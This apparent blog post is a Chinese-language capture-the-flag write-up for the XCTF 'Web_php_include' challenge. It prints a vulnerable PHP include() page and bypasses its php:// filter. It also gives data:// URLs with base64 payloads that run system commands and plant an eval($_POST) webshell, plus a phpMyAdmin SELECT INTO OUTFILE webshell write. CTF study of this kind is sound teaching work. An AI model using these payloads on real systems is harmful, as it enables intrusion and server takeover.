首页
学习
活动
专区
圈层
工具
发布
社区首页 >专栏 >【愚公系列】2021年12月 攻防世界-进阶题-WEB-004(Web_php_include)

【愚公系列】2021年12月 攻防世界-进阶题-WEB-004(Web_php_include)

作者头像
愚公搬代码
发布2021-12-27 08:12:19
发布2021-12-27 08:12:19
5700
举报
文章被收录于专栏:历史专栏历史专栏

文章目录


一、Web_php_include

题目链接:https://adworld.xctf.org.cn/task/task_list?type=web&number=3&grade=1&page=1

二、使用步骤

1.点击获取在线场景

2.查看页面

打开页面得到如下代码

代码语言:javascript
复制
<?php
show_source(__FILE__);
echo $_GET['hello'];
$page=$_GET['page'];
while (strstr($page, "php://")) {
    $page=str_replace("php://", "", $page);
}
include($page);
?>

分析代码可知程序过滤掉了page=参数传入php://

3.大小写绕过

大小写绕过由于strstr()这个函数是区分大小写的所以我们可以转换成大小写用PHP://input

Post传输恶意代码

植入木马进行控制

4.data://伪协议执行命令利用

base64编码后使用

代码语言:javascript
复制
http://111.200.241.244:62364/?page=data://text/plain/;base64,PD9waHAgc3lzdGVtKCJjYXQgZmw0Z2lzaXNpc2gzcjMucGhwIik/Pg==

查看源码得到flag

4.中国蚁剑

base64加密后拼接

代码语言:javascript
复制
http://111.200.241.244:62364/?page=data://text/plain/;base64,PD9waHAgZXZhbCgkX1BPU1RbeGlhb2h1YV0pOyA/Pg==

蚁剑连接就好

5.数据库写入马

御剑扫描获得phpmyadmin root 密码空 进入

数据库执行这条命令查看secure_file_priv是否为空,为空则可以写数据 如果是null不能写

代码语言:javascript
复制
SHOW VARIABLES LIKE "secure_file_priv"

linux默认tmp是可写目录 试试写入一句话马 菜刀连接

代码语言:javascript
复制
SELECT ""
INTO OUTFILE '/tmp/test1.php'

flag为:ctf{876a5fca-96c6-4cbd-9075-46f0c89475d2}


总结

  • 伪协议
  • 菜刀,蚁剑
  • 数据库写入马
本文参与 腾讯云自媒体同步曝光计划,分享自作者个人站点/博客。
原始发表:2021/12/26 ,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 作者个人站点/博客 前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体同步曝光计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
目录
  • 文章目录
  • 一、Web_php_include
  • 二、使用步骤
    • 1.点击获取在线场景
    • 2.查看页面
    • 3.大小写绕过
    • 4.data://伪协议执行命令利用
    • 4.中国蚁剑
    • 5.数据库写入马
  • 总结
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档